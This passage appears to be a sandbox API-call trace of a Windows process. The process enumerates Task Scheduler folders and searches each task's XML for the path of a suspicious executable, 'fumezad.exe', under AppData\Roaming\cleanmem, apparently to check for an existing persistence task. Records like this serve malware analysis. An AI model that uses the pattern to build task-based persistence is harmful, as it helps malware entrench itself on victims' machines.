This=0x12b5e0, pName=0x24da80 | out: pName=0x24da80*="AD RMS Rights Policy Template Management (Automated)") returned 0x0 [0138.746] IRegisteredTask:get_Xml (in: This=0x12b5e0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n true\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n true\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n false\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n") returned 0x0 [0138.750] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6002)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n 2006-11-09T03:00:00\r\n true\r\n PT1H\r\n \r\n 1\r\n \r\n \r\n \r\n true\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n false\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {CF2CF428-325B-48D3-8CA8-7633E36E5A32}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.750] IUnknown:Release (This=0x12b5e0) returned 0x0 [0138.750] IRegisteredTaskCollection:get_Item (in: This=0x127040, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5e0) returned 0x0 [0138.750] IRegisteredTask:get_Name (in: This=0x12b5e0, pName=0x24da80 | out: pName=0x24da80*="AD RMS Rights Policy Template Management (Manual)") returned 0x0 [0138.750] IRegisteredTask:get_Xml (in: This=0x12b5e0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n true\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {BF5CB148-7C77-4d8a-A53E-D81C70CF743C}\r\n \r\n \r\n") returned 0x0 [0138.754] StrStrIW (lpFirst="\r\n\r\n \r\n 2006-11-10T14:29:55.5851926\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6001)\r\n $(@%systemRoot%\\System32\\msdrm.dll,-6003)\r\n \\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \r\n \r\n \r\n false\r\n PT1H\r\n \r\n \r\n \r\n \r\n S-1-1-0\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n Parallel\r\n true\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT1H\r\n 7\r\n true\r\n \r\n \r\n \r\n {BF5CB148-7C77-4d8a-A53E-D81C70CF743C}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.754] IUnknown:Release (This=0x12b5e0) returned 0x0 [0138.754] IUnknown:Release (This=0x127040) returned 0x0 [0138.754] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x127040) returned 0x0 [0138.756] ITaskFolderCollection:get_Count (in: This=0x127040, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.756] IUnknown:Release (This=0x127040) returned 0x0 [0138.756] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.756] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.756] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fe0) returned 0x0 [0138.759] IRegisteredTaskCollection:get_Count (in: This=0x126fe0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0138.759] IRegisteredTaskCollection:get_Item (in: This=0x126fe0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127130) returned 0x0 [0138.759] IRegisteredTask:get_Name (in: This=0x127130, pName=0x24da80 | out: pName=0x24da80*="PolicyConverter") returned 0x0 [0138.759] IRegisteredTask:get_Xml (in: This=0x127130, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n true\r\n false\r\n true\r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n") returned 0x0 [0138.762] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-300)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-301)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-302)\r\n Microsoft\\Windows\\AppID\\PolicyConverter\r\n \r\n \r\n true\r\n false\r\n true\r\n Queue\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidpolicyconverter.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.762] IUnknown:Release (This=0x127130) returned 0x0 [0138.762] IRegisteredTaskCollection:get_Item (in: This=0x126fe0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127130) returned 0x0 [0138.762] IRegisteredTask:get_Name (in: This=0x127130, pName=0x24da80 | out: pName=0x24da80*="VerifiedPublisherCertStoreCheck") returned 0x0 [0138.762] IRegisteredTask:get_Xml (in: This=0x127130, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n true\r\n PT30M\r\n \r\n PT24H\r\n \r\n \r\n \r\n \r\n true\r\n 10\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n false\r\n true\r\n Queue\r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n") returned 0x0 [0138.765] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-200)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-201)\r\n $(@%systemroot%\\system32\\appidsvc.dll,-202)\r\n Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck\r\n \r\n \r\n \r\n true\r\n PT30M\r\n \r\n PT24H\r\n \r\n \r\n \r\n \r\n true\r\n 10\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n false\r\n true\r\n Queue\r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\appidcertstorecheck.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.765] IUnknown:Release (This=0x127130) returned 0x0 [0138.765] IUnknown:Release (This=0x126fe0) returned 0x0 [0138.765] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fe0) returned 0x0 [0138.766] ITaskFolderCollection:get_Count (in: This=0x126fe0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.766] IUnknown:Release (This=0x126fe0) returned 0x0 [0138.766] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.766] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.766] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x127000) returned 0x0 [0138.769] IRegisteredTaskCollection:get_Count (in: This=0x127000, pCount=0x24dbd0 | out: pCount=0x24dbd0*=2) returned 0x0 [0138.769] IRegisteredTaskCollection:get_Item (in: This=0x127000, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.769] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="AitAgent") returned 0x0 [0138.769] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\AitAgent\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-702)\r\n \r\n \r\n \r\n 2007-10-08T02:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT3M\r\n PT22H\r\n true\r\n true\r\n \r\n 9\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n aitagent\r\n \r\n \r\n") returned 0x0 [0138.772] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\AitAgent\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-701)\r\n $(@%SystemRoot%\\system32\\aitagent.exe,-702)\r\n \r\n \r\n \r\n 2007-10-08T02:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT3M\r\n PT22H\r\n true\r\n true\r\n \r\n 9\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n aitagent\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.772] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.772] IRegisteredTaskCollection:get_Item (in: This=0x127000, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.772] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="ProgramDataUpdater") returned 0x0 [0138.772] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-702)\r\n \r\n \r\n \r\n 2007-10-08T00:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n 4\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n aepdu.dll,AePduRunUpdate\r\n \r\n \r\n") returned 0x0 [0138.775] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n \\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-701)\r\n $(@%SystemRoot%\\system32\\aepdu.dll,-702)\r\n \r\n \r\n \r\n 2007-10-08T00:30:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n true\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n PT23H\r\n true\r\n true\r\n \r\n 4\r\n true\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n aepdu.dll,AePduRunUpdate\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.775] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.775] IUnknown:Release (This=0x127000) returned 0x0 [0138.775] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x127000) returned 0x0 [0138.776] ITaskFolderCollection:get_Count (in: This=0x127000, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.776] IUnknown:Release (This=0x127000) returned 0x0 [0138.776] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.777] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.777] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fe0) returned 0x0 [0138.779] IRegisteredTaskCollection:get_Count (in: This=0x126fe0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.779] IRegisteredTaskCollection:get_Item (in: This=0x126fe0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127130) returned 0x0 [0138.779] IRegisteredTask:get_Name (in: This=0x127130, pName=0x24da80 | out: pName=0x24da80*="Proxy") returned 0x0 [0138.779] IRegisteredTask:get_Xml (in: This=0x127130, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT31536000S\r\n false\r\n false\r\n \r\n false\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n") returned 0x0 [0138.781] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\acproxy.dll,-100)\r\n $(@%systemroot%\\system32\\acproxy.dll,-101)\r\n $(@%systemroot%\\system32\\acproxy.dll,-102)\r\n Microsoft\\Windows\\Autochk\\Proxy\r\n \r\n \r\n \r\n PT30M\r\n true\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT31536000S\r\n false\r\n false\r\n \r\n false\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n /d acproxy.dll,PerformAutochkOperations\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.781] IUnknown:Release (This=0x127130) returned 0x0 [0138.781] IUnknown:Release (This=0x126fe0) returned 0x0 [0138.781] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fe0) returned 0x0 [0138.783] ITaskFolderCollection:get_Count (in: This=0x126fe0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.784] IUnknown:Release (This=0x126fe0) returned 0x0 [0138.784] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.784] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.784] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126ff0) returned 0x0 [0138.786] IRegisteredTaskCollection:get_Count (in: This=0x126ff0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.786] IRegisteredTaskCollection:get_Item (in: This=0x126ff0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.786] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="UninstallDeviceTask") returned 0x0 [0138.786] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n true\r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n") returned 0x0 [0138.789] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)\r\n $(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Parallel\r\n true\r\n \r\n \r\n \r\n BthUdTask.exe\r\n $(Arg0)\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.789] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.789] IUnknown:Release (This=0x126ff0) returned 0x0 [0138.789] ITaskFolder:GetFolders (in: This=0x126f50, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126ff0) returned 0x0 [0138.791] ITaskFolderCollection:get_Count (in: This=0x126ff0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.791] IUnknown:Release (This=0x126ff0) returned 0x0 [0138.791] TaskScheduler:IUnknown:Release (This=0x126f50) returned 0x0 [0138.791] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126f50) returned 0x0 [0138.791] ITaskFolder:GetTasks (in: This=0x126f50, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x127010) returned 0x0 [0138.795] IRegisteredTaskCollection:get_Count (in: This=0x127010, pCount=0x24dbd0 | out: pCount=0x24dbd0*=3) returned 0x0 [0138.795] IRegisteredTaskCollection:get_Item (in: This=0x127010, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.795] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="SystemTask") returned 0x0 [0138.795] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query Id=\"0\" Path=\"System\">\r\n <Select Path=\"System\">\r\n *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n </Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0138.799] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\SystemTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query Id=\"0\" Path=\"System\">\r\n <Select Path=\"System\">\r\n *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n </Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n PT10S\r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.799] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.799] IRegisteredTaskCollection:get_Item (in: This=0x127010, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.799] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="UserTask") returned 0x0 [0138.799] IRegisteredTask:get_Xml (in: This=0x12b5a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]</Select></Query></QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0138.803] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]</Select></Query></QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.803] IUnknown:Release (This=0x12b5a0) returned 0x0 [0138.803] IRegisteredTaskCollection:get_Item (in: This=0x127010, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x12b5a0) returned 0x0 [0138.803] IRegisteredTask:get_Name (in: This=0x12b5a0, pName=0x24da80 | out: pName=0x24da80*="UserTask-Roam") returned 0x0 [0138.803] IRegisteredTask:get_Xml (in: This=0x12b5a0, 